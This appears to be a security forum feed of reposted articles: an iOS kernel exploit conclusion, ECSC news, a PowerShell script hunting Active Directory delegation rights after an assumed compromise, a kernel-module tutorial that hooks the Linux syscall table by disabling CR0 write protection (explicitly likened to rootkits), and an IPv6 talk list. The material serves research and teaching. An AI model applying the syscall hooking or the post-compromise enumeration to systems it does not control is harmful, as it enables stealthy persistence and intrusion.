I reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a, which fixed the issue. Since this would be an incredibly quick turnaround for Apple, I suspected that this bug was found and reported by some other party first.

I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. SorryMybad used this vulnerability as part of a remote jailbreak for the Tianfu Cup; you can read about his strategy for obtaining tfp0.

Conclusion

This post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state.
In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up.

This bug is also a good reminder that placeholder code can also introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem.

And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers.

My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP.

Posted by Ben at 10:15 AM

Source: https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html
  4. Nytro

    Why...???

    Most likely you have to send them a request to be removed from the blacklist. How and where? No idea.
  5. Nytro

    Why...???

    Their search engine probably found who knows what "interesting" stuff on our site (e.g. code?), and RST got blacklisted.
  6. Yes, the age limit must be respected. This matters: this year the competition will take place in Romania, and it would be good for Romania to make a good impression. I recommend that everyone passionate about security sign up. Some details about how it went last year are available in the presentation by one of the guys who took part last year:
  7. S-au deschis înscrierile pentru Campionatul European de Securitate Cibernetică 2019 Recomandat Ioana Tanase Marți, 29 Ianuarie 2019 12:29 La sediul CERT-RO a avut loc o nouă întâlnire dedicată organizării European Cyber Security Championship (ECSC) în România. La întrevedere au participat reprezentanţi ai CERT-RO, SRI şi ANSSI, organizatori tradiţionali ai competiţiei în România, dar şi susţinători sau posibili sponsori din spaţiul public sau privat. Discuţiile s-au concentrat pe organizarea fazei naţionale a competiţiei, precum şi etapa finală din luna octombrie, care va avea loc la Bucureşti. ECSC este un concurs la nivel european, care are ca temă securitatea cibernetică. Proiectul este susţinut anual de către European Union Agency for Network Internet Security (ENISA). În cadrul ECSC, echipele fiecărui stat participant sunt implicate atât în exerciţii de colaborare, cât şi în competiţie. Probele campionatului acoperă domenii precum securitate web, securitate mobilă, puzzleuri criptografice, inginerie inversă şi investigaţii. Concursul are o etapă naţională, prin care se face selecţia echipei României, pregătitoare pentru întrecerea finală, la nivel european. Participanţii care vor să se înscrie în competiţie trebuie să îndeplinească următoarele criterii: vârsta cuprinsă între 16 şi 25 de ani; cetăţeni ai ţării pentru care participă sau locuiesc şi urmează o formă de învăţământ în această ţară. Echipele sunt formate din 2 (maxim 3) antrenori şi maxim 10 concurenţi din 2 categorii: 5 juniori (între 16 şi 20 ani) şi 5 seniori (între 21 şi 25 ani). Vârsta de referinţă este vârsta concurentului la sfarsitul anului calendaristic. În 2018, echipa României a ocupat locul al doilea dintr-un total de 10 ţări participante la ediţia din acest an a Campionatului European de Securitate Cibernetică (ECSC) desfăşurat la Duesseldorf, în Germania, în perioada 7 - 10 noiembrie 2018. 
This is the best result Romania has achieved in the European competition. It is owed both to the experience gained in the previous edition and the sustained training of the team members throughout the year, and to the dedication of the instructors who supported the 10 members of the squad. At the same time, Romania's team was appreciated by the jury and was named, for the second year in a row, the team with the best presentation of how it solved the competition tasks. Registration: http://www.cybersecuritychallenge.ro/ Source: https://www.monitoruldegalati.ro/national/s-au-deschis-inscrierile-pentru-campionatul-european-de-securitate-cibernetica-2019.html
  8. ShellcodeCompiler has been updated! It now uses @keystone_engine to assemble shellcodes! https://github.com/NytroRST/ShellcodeCompiler
  9. Bug fixed: http://xssfuzzer.com/
  10. I abused energy drinks and it did me no good, so I gave them up completely. Sleep is the foundation: get as much of it as you can. It helps in many ways, and no substance can replace it.
  11. It's up to you. They are different things: a pentester is more on the "attacker" side, while a security analyst is more on the defense side.
  12. Hunting the Delegation Access January 17, 2019 Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory can delegate certain rights to non-admin users (users who are not domain, forest or enterprise admins) so that they can perform administrative tasks over a specific part of AD. If misconfigured, this capability can become a major path to AD compromise. Earlier we only talked about manual analysis for finding such delegations, and another article covered multiple other tools that help with such manual analysis. Today, we are going to look at other options to hunt for these delegations across a network in a (semi-)automated manner via scripts. Setting the scene We'll assume the following scenario: We have previously compromised a low-privilege domain user with severe restrictions, such as PowerShell execution disabled via AppLocker. We have also compromised local admin access on a domain-joined machine. This local admin access allows us to run unrestricted PowerShell scripts; however, we still need the domain login to perform enumeration on the AD domain. To achieve that, we will use two different approaches: Using ADACLScanner (semi-automated) and Using a custom PowerShell script by NSS (fully automated). Using ADACLScanner This tool is written by canix1 and is useful for generic ACL scanning. It can be found on GitHub (https://github.com/canix1/ADACLScanner). We can repurpose this tool for AD delegation hunting. We will explain the process with the help of an example below: When you run the PowerShell script from ADACLScanner, you are greeted with a nice GUI (one of the rare PowerShell tools with a nice GUI). [Figure: ADACLScanner] So let's say we connect to the AD domain "plum", available at 192.168.3.215, as shown in the screenshot below.
[Figure: Connecting to AD] When we click Connect in the first column, we are prompted to enter a domain credential so that the tool can enumerate the node. Note that this can be the credential of any low-privilege user in the domain. [Figure: Requesting Domain Credentials] Once we enter the domain credentials correctly, we are shown the available nodes, as below. [Figure: Listing AD Nodes] Now all we have to do is highlight the node in the first column, make sure inherited permissions is unticked and click Run Scan. In the scenario above we selected the highest node, "DC=plum,DC=local". The report generated after the scan completes will look roughly as shown below. [Figure: ACL Scanner Report] If we highlight the Regions node and run the scan, the report looks somewhat different. Notice that the Object column in the report shows the node for which the ACL report has been extracted; here the OU is Regions. [Figure: ACL Report for Regions OU] Similarly, if you run the scan for the USA OU, the report shows the delegation permissions for the USA OU. [Figure: AD ACL Scanner report for OU USA] The hassle here is that you have to manually go through every node and then analyze every entry to find the relevant delegations. That is fine for a small network, but the task can become a nightmare on a large one. This is where our second approach is useful. Using Custom Powershell Script by NSS Let me first show you how the script prepared by our team works. If you are only interested in the automated script, here is the online version: go and grab it. If you are interested in the internal workings of the script, here is a block-by-block breakdown. Getting User Credentials and AD Drive Hack We started as a non-domain (but local admin) user. This is why we get the error below whenever we try to mount an AD drive or import the ActiveDirectory module.
[Figure: AD Module Import Error] To get around this, we passed the "-WarningAction SilentlyContinue" parameter. Let us dissect the script. The first bit reads as follows:

```powershell
Import-Module ActiveDirectory -WarningAction SilentlyContinue

# force use of specified credentials everywhere
$creds = Get-Credential
$PSDefaultParameterValues = @{"*-AD*:Credential" = $creds}

# GET DC Name
$dcname = (Get-ADDomainController).Name
New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds
Set-Location AD:
```

Here is a breakdown of the commands above. Since we are acting as a non-domain user, we start by importing the "ActiveDirectory" module with "-WarningAction SilentlyContinue". This lets us import the module, but the AD drive is not mounted. Next, we prompt the user for credentials. Once they are entered, we set "PSDefaultParameterValues" so that every cmdlet with "-AD" in its name uses them. We then mount the AD drive with these credentials; for this we need a server name, which we obtain with the "Get-ADDomainController" cmdlet. None of this would be required if you were already logged in as a domain user. However, we wanted to cover the worst case, where you have access to a system as a local admin (hence unrestricted PowerShell access) but only limited domain user credentials.
Navigating Entire OU

```powershell
# Get all domain names, organizational units, and individual AD objects
$OUs  = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName)
$OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName
$OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName
```

Here is what happens: the first line runs "Get-ADDomain" and takes its "DistinguishedName" property. The second line appends the distinguished names of all OUs returned by "Get-ADOrganizationalUnit -Filter *". The third line appends the distinguished names of the containers (objectClass=container) found one level below the domain root. Adding Exclusions

```powershell
$domain = (Get-ADDomain).Name
$groups_to_ignore = ("$domain\Enterprise Admins", "$domain\Domain Admins")
# 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF'
```

These lines set up the exclusion list: we first fetch the domain name and then list the groups to ignore. More principals, such as those in the commented-out line, can be added. Extracting Relevant Domain User/Group Permissions

```powershell
ForEach ($OU in $OUs) {
    # $schemaIDGUID is a hashtable mapping schemaIDGUID -> name; it is assumed to be
    # built earlier in the full script (it is not defined in this excerpt)
    $report += Get-Acl -Path "AD:\$OU" |
        Select-Object -ExpandProperty Access |
        ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} |
        Select-Object @{name='organizationalUnit';expression={$OU}}, `
                      @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, `
                      @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, `
                      *
}
```

As we saw in the navigation step, we stored all the distinguished names in $OUs. Here we use a "ForEach" loop to process each of them. The Get-Acl pipeline fetches the ACL of each entry in $OUs. The "?" (Where-Object) filter then keeps only the access rules whose "IdentityReference" matches the domain and is not in the groups-to-ignore list from the "Adding Exclusions" step. The final Select-Object builds the output columns. "organizationalUnit" is set to the current entry of $OUs. "objectTypeName" is "All" when the object type is the all-zero GUID; otherwise it is the name looked up in "$schemaIDGUID" for that object type. Inheritance == False Inheritance set to false is the key to everything: we only need the entries where inheritance is false.

```powershell
$filterrep = $report | Where-Object {-not $_.IsInherited}
```

This ensures that inherited entries are not shown in the output. Array Conversion: Array to Console Table

```powershell
Write-Output ($filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String)
```

This finally produces a neatly formatted table of the users holding non-inherited (i.e. delegated) rights on specific objects. By default, delegated rights cascade down the OU tree: if a top-level OU has the rights, they automatically apply to the OUs below it unless explicitly removed. [Figure: Result of Automated Script] <shameless plug> This, and other such useful techniques, are demonstrated in our latest Advanced Infrastructure Hacking course (2019 edition). We also provide in-house training and CTFs for internal security and SOC teams to help them advance their skill sets. </shameless plug> Source: https://www.notsosecure.com/hunting-the-delegation-access/
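The per-ACL filtering the script performs can be sketched in C:

- drop inherited entries;
- keep only principals from the domain;
- skip the ignored groups;
- label the all-zero object-type GUID as "All".

This is a minimal illustration, not part of the NSS script. The `struct ace` type, its fields and the helper names are hypothetical stand-ins for the properties Get-Acl returns. The domain check is a case-insensitive "DOMAIN\" prefix match, an assumption that is stricter than the script's regex `-match "$domain*"`.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <strings.h> /* strcasecmp, strncasecmp (POSIX) */

/* Hypothetical, simplified access rule mirroring the Get-Acl properties used above. */
struct ace {
    const char *identity_reference; /* e.g. "PLUM\\helpdesk" */
    const char *object_type;        /* schemaIDGUID as text */
    bool is_inherited;
};

#define ZERO_GUID "00000000-0000-0000-0000-000000000000"

/* True if the identity looks like "<domain>\<name>" (case-insensitive). */
static bool in_domain(const char *identity, const char *domain)
{
    size_t n = strlen(domain);
    return strncasecmp(identity, domain, n) == 0 && identity[n] == '\\';
}

/* True if the identity is one of the excluded groups. */
static bool is_ignored(const char *identity, const char *const *ignore, size_t n_ignore)
{
    for (size_t i = 0; i < n_ignore; i++)
        if (strcasecmp(identity, ignore[i]) == 0)
            return true;
    return false;
}

/* Keep explicit (non-inherited) rules granted to non-ignored domain principals.
 * Pointers to the kept rules are written to out[]; returns how many were kept. */
size_t filter_delegations(const struct ace *aces, size_t n, const char *domain,
                          const char *const *ignore, size_t n_ignore,
                          const struct ace **out)
{
    size_t kept = 0;
    for (size_t i = 0; i < n; i++) {
        const struct ace *a = &aces[i];
        if (a->is_inherited)
            continue; /* same idea as Where-Object {-not $_.IsInherited} */
        if (!in_domain(a->identity_reference, domain))
            continue;
        if (is_ignored(a->identity_reference, ignore, n_ignore))
            continue;
        out[kept++] = a;
    }
    return kept;
}

/* The all-zero GUID means "applies to all object types"; otherwise return the raw
 * GUID (the script instead looks the name up in $schemaIDGUID). */
const char *object_type_label(const struct ace *a)
{
    return strcmp(a->object_type, ZERO_GUID) == 0 ? "All" : a->object_type;
}
```

The comparisons are case-insensitive because PowerShell's `-match` and `-notin` compare strings case-insensitively by default.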
  13. How to write a rootkit without really trying January 17, 2019 We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out! This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We'll go through a quick refresher on syscalls and why we might want to intercept them, and then demonstrate a bare-bones module that intercepts the read(2) syscall. But first, you might be wondering: What makes this any different from $other_fault_injection_strategy? Other fault injection tools rely on a few different techniques: There's the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but it comes with some major downsides: LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular. Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc, open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake. Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead.
Injecting faults within kernel space sidesteps the downsides of both of these approaches. It intercepts the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking whether a given syscall is one we'd like to fault). What makes this any different from $other_blog_post_on_syscall_interception? Other blog posts address the interception of syscalls, but many: Grab the syscall table by parsing their kernel's System.map, which can be unreliable (and is slower than the approach we give below). Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+). Involve prodding large ranges of kernel memory, which is slow and probably dangerous. Basically, we couldn't find a recent (>2015) blog post that described a syscall interception process that we liked, so we developed our own. Why not just use eBPF or kprobes? eBPF can't intercept syscalls; it can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven't come across a really good source of information about it online. In any case, the point here is to do it ourselves! Will this work on $architecture? For the most part, yes. You'll need to make some adjustments to the write-unlocking macro for non-x86 platforms. What's a syscall? A syscall, or system call, is a function[1] that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes. Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.[2] The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth.
The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like write(2) and read(2), but with additional transmission flags. ioctl(2) is the kernel's garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities, the underlying principle behind their usage (and interception) remains the same. If you'd like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64. Unlike regular function calls in user space, syscalls are extraordinarily expensive. On x86 architectures, int 80h (or the more modern sysenter/syscall instructions) makes both the CPU and the kernel execute slow interrupt-handling code paths and perform a privilege-context switch.[3] Why intercept syscalls? For a few different reasons: We're interested in gathering statistics about a given syscall's usage, beyond what eBPF or another instrumentation API could (easily) provide. We're interested in fault injection that can't be avoided by static linking or manual syscall(3) invocations (our use case). We're feeling malicious, and we want to write a rootkit that's hard to remove from user space (and possibly even kernel space, with a few tricks).[4] Why do I need fault injection? Fault injection finds bugs in places that fuzzing and conventional unit testing often won't: NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds? Are you sure that you're doing better than systemd?); memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers; integer over/underflow caused by invalid or unexpected values (are you sure you're not making incorrect assumptions about stat(2)'s atime/mtime/ctime fields?).
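To make the getcwd point concrete, here is a minimal C sketch of the defensive pattern that fault injection exercises. The helper name `print_cwd` is hypothetical. getcwd() returns NULL and sets errno on failure, for example ERANGE when the buffer is too small. Code that skips this check ends up using a NULL pointer exactly when an injected fault makes the call fail.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>

/* Print the current working directory using the caller's buffer.
 * Returns 0 on success or -errno on failure, instead of assuming success. */
int print_cwd(char *buf, size_t size)
{
    if (getcwd(buf, size) == NULL)
        return -errno; /* e.g. -ERANGE (buffer too small), -ENOENT (cwd unlinked) */

    printf("cwd: %s\n", buf);
    return 0;
}
```

A one-byte buffer can never hold even "/" plus its terminator, so that case reliably takes the error path without needing a fault injector at all.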
Getting started: Finding the syscall table Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5. First, we need to get the syscall table's address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides a better interface than either of these: kallsyms_lookup_name. This makes retrieving the syscall table as easy as:

```c
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/module.h>

MODULE_LICENSE("GPL"); /* kallsyms_lookup_name is a GPL-only export */

static unsigned long *sys_call_table;

int init_module(void)
{
  sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

  if (sys_call_table == NULL) {
    printk(KERN_ERR "Couldn't look up sys_call_table\n");
    return -1;
  }

  return 0;
}
```

Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=y. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn't enable kallsyms by default, consider using a VM for one that does (you weren't going to test this code on your host, were you?). Injecting our replacement syscalls Now that we have the kernel's syscall table, injecting our replacement should be as easy as:

```c
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h> /* sys_read */
#include <linux/unistd.h>   /* __NR_read */

MODULE_LICENSE("GPL");

static unsigned long *sys_call_table;
static typeof(sys_read) *orig_read;

/* asmlinkage is important here -- the kernel expects syscall parameters to be
 * on the stack at this point, not inside registers.
 */
asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
  printk(KERN_INFO "Intercepted read of fd=%d, %zu bytes\n", fd, count);

  return orig_read(fd, buf, count);
}

int init_module(void)
{
  sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

  if (sys_call_table == NULL) {
    printk(KERN_ERR "Couldn't look up sys_call_table\n");
    return -1;
  }

  orig_read = (typeof(sys_read) *)sys_call_table[__NR_read];
  sys_call_table[__NR_read] = (unsigned long)&phony_read;

  return 0;
}

void cleanup_module(void)
{
  /* Don't forget to fix the syscall table on module unload, or you'll be in
   * for a nasty surprise!
   */
  sys_call_table[__NR_read] = (unsigned long)orig_read;
}
```

…but it isn't that easy, at least not on x86: sys_call_table is write-protected by the CPU itself, and attempting to modify it causes a page fault (#PF) exception.[5] To get around this, we twiddle bit 16 of the cr0 register (the WP flag), which controls the write-protect state:

```c
#define CR0_WRITE_UNLOCK(x) \
  do { \
    write_cr0(read_cr0() & (~X86_CR0_WP)); \
    x; \
    write_cr0(read_cr0() | X86_CR0_WP); \
  } while (0)
```

Then, our insertions become a matter of:

```c
CR0_WRITE_UNLOCK({
  sys_call_table[__NR_read] = (unsigned long)&phony_read;
});
```

and:

```c
CR0_WRITE_UNLOCK({
  sys_call_table[__NR_read] = (unsigned long)orig_read;
});
```

and everything works as expected…almost. We've assumed a single processor; there's an SMP-related race condition in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we'd get a page fault instead of a successful memory write.
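The unlock macro changes exactly one bit. WP is bit 16 of cr0, counting from zero, and the kernel names its mask X86_CR0_WP. The masking can be checked in user space with ordinary integers. The sketch below redefines the mask locally under a hypothetical name (`CR0_WP_MASK`) and uses an arbitrary example register value, because only ring 0 can read or write the real cr0.

```c
#include <stdbool.h>
#include <stdint.h>

/* WP (write protect) is bit 16 of CR0. CR0_WP_MASK is a local stand-in for the
 * kernel's X86_CR0_WP so this builds in user space. */
#define CR0_WP_BIT  16
#define CR0_WP_MASK (UINT64_C(1) << CR0_WP_BIT)

/* Value written before the protected store: WP cleared, all other bits kept. */
static inline uint64_t cr0_clear_wp(uint64_t cr0) { return cr0 & ~CR0_WP_MASK; }

/* Value written afterwards to restore protection. */
static inline uint64_t cr0_set_wp(uint64_t cr0) { return cr0 | CR0_WP_MASK; }

static inline bool cr0_wp_enabled(uint64_t cr0) { return (cr0 & CR0_WP_MASK) != 0; }
```

Every other bit is left untouched. That is why the macro reads cr0 and masks it rather than writing a constant.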
The chances of such a preemption race are pretty slim, but it doesn't hurt to be careful and guard the critical section:

```c
#define CR0_WRITE_UNLOCK(x) \
  do { \
    unsigned long __cr0; \
    preempt_disable(); \
    __cr0 = read_cr0() & (~X86_CR0_WP); \
    BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \
    write_cr0(__cr0); \
    x; \
    __cr0 = read_cr0() | X86_CR0_WP; \
    BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \
    write_cr0(__cr0); \
    preempt_enable(); \
  } while (0)
```

(The astute will notice that this is almost identical to the "rare write" mechanism from PaX/grsecurity. This is not a coincidence: it's based on it!) What's next? The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault:

```c
asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
  return -ENOSYS;
}
```

…or a fault for a particular user:

```c
asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
  if (current_uid().val == 1005) {
    return -ENOSYS;
  } else {
    return orig_read(fd, buf, count);
  }
}
```

…or return bogus data:

```c
asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
  unsigned char kbuf[1024];
  /* never copy more than the caller asked for */
  size_t n = min_t(size_t, count, sizeof(kbuf));

  memset(kbuf, 'A', n);
  if (copy_to_user(buf, kbuf, n))
    return -EFAULT;

  return n;
}
```

Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound! Wrap up This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you'll need to read a good kernel module programming guide[6] and do the legwork yourself.
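The hook/restore pattern and the per-user fault can be modelled entirely in user space. An array of function pointers stands in for sys_call_table. This is a hedged analogue, not kernel code: the table, `NR_FAKE_READ`, the simulated uid and all helper names are hypothetical, and there is no write protection to unlock.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>

/* Hypothetical stand-in for a syscall table: call number -> handler. */
typedef long (*call_fn)(int fd, char *buf, size_t count);

enum { NR_FAKE_READ = 0, NR_FAKE_CALLS };

/* The "real" handler: fills the buffer and reports a full read. */
static long real_read(int fd, char *buf, size_t count)
{
    (void)fd;
    for (size_t i = 0; i < count; i++)
        buf[i] = 'x';
    return (long)count;
}

static call_fn call_table[NR_FAKE_CALLS] = { [NR_FAKE_READ] = real_read };
static call_fn orig_read;            /* saved entry, like orig_read in the module */
static uid_t simulated_uid;          /* stands in for current_uid().val */
static const uid_t fault_uid = 1005; /* the user whose reads get faulted */

void set_simulated_uid(uid_t uid) { simulated_uid = uid; }

/* Replacement handler: inject -ENOSYS for one user, pass through otherwise. */
static long phony_read(int fd, char *buf, size_t count)
{
    if (simulated_uid == fault_uid)
        return -ENOSYS;
    return orig_read(fd, buf, count);
}

/* Save the original entry, then swap in the replacement. */
void hook_read(void)
{
    orig_read = call_table[NR_FAKE_READ];
    call_table[NR_FAKE_READ] = phony_read;
}

/* Restore the original entry, as cleanup_module() does. */
void unhook_read(void) { call_table[NR_FAKE_READ] = orig_read; }

/* Dispatch through the table, roughly as the kernel's syscall entry path does. */
long dispatch(int nr, int fd, char *buf, size_t count)
{
    return call_table[nr](fd, buf, count);
}
```

As in the module, callers never see the swap. They keep dispatching by number, and only the table entry decides whether they reach the real handler.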
Our new tool, KRF, does everything mentioned above and more. It can intercept and fault syscalls with per-executable precision, operate on an entire syscall "profile" (e.g., all syscalls that touch the filesystem or perform process scheduling), and fault in real time without breaking a sweat. Oh, and static linkage doesn't bother it one bit: if your program makes any syscalls, KRF will happily fault them. Other work Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there. syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but it actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it's still pretty cool. ptrace(2) can be used to instrument syscalls made by a child process, all within user space. It comes with two considerable downsides, though: it can't be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It's also slow. Chris Wellons's awesome blog post covers ptrace(2)'s many abilities.

[1] More of a "service request" than a "function" in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication.
[2] The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel's vDSO for many frequently called syscalls, like time(2).
[3] No process context switch is necessary: Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur.
[4] I won't detail this because it's outside of this post's scope, but consider that init_module(2) and delete_module(2) are just normal syscalls.
[5] Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child.
[6] This one's over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search.

Source: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  14. IPv6 Talks & Publications First of all, a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track, I realized that quite a lot of IPv6-related topics have been covered in recent years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self-plug, I then decided to put together a list of the IPv6 talks I gave on various occasions and of the publications I (co-)authored. Please find this list below (sorted by year); you can click on the titles to access the respective documents/sources. I hope some of this can help some of you in your own IPv6 efforts. Cheers, Enno

2018
- IPv6 Address Management – The First Five Years
- Properties of IPv6 and Their Implications for Offense & Defense

2017
- Why it might make sense to use IPv6 in enterprise infrastructure projects
- Position Paper on an Enterprise Organization’s IPv6 Address Strategy
- Balanced Security for IPv6 CPE Revisited
- Local Packet Filtering with IPv6
- IPv6 Address Selection – A Look from the Lab
- Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications
- Testing RFC 6980 Implementations with Chiron
- IPv6 configuration approaches for servers / slides with additional infos
- IPv6 Properties of Windows Server 2016 / Windows 10

2016
- Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404
- IPv6 from a Developers’ Perspective
- Things to Consider When Deploying IPv6 in Enterprise Space
- IPv6 & Threat Intelligence
- Protecting Hosts in IPv6 Networks
- Remote Access and Business Partner Connections
- Developing an Enterprise IPv6 Security Strategy
- Dual Stack vs. IPv6-only in Enterprise Networks
- Things to Consider When Starting Your IPv6 Deployment
- IPv6 Address Planning in 2016 / Observations

2015
- Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security
- Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer
- Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I)
- Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II)
- Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features
- Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level
- Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate
- IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations
- Main IPv6 Related Mailing Lists
- IPv6 in Virtualized Data Centers
- The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them
- Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6
- IPv6 Address Planning / Some Notes
- OS IPv6 Behavior in Conflicting Environments
- What to Do Today if You Want to Deploy IPv6 Tomorrow
- Is IPv6 more Secure than IPv4? Or Less?
- IPv6 & Complexity
- MLD Considered Harmful
- Reliable & Secure DHCPv6
- IPv6-related Requirements for the Internet Uplink or MPLS Networks
- An MLD Testing Methodology
- Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6
- /48 Considered Harmful. On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs
- The Persistent Problem of State in IPv6 (Security)
- IPv6-related Requirements for Security Devices
- Evaluation of IPv6 Capabilities of Commercial IPAM Solutions

2014
- Security Implications of Using IPv6 GUAs Only
- Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region
- Evasion of High-End IDPS Devices at the IPv6 Era
- IPv6 in RFIs/Tendering Processes
- Protocol Properties & Attack Vectors
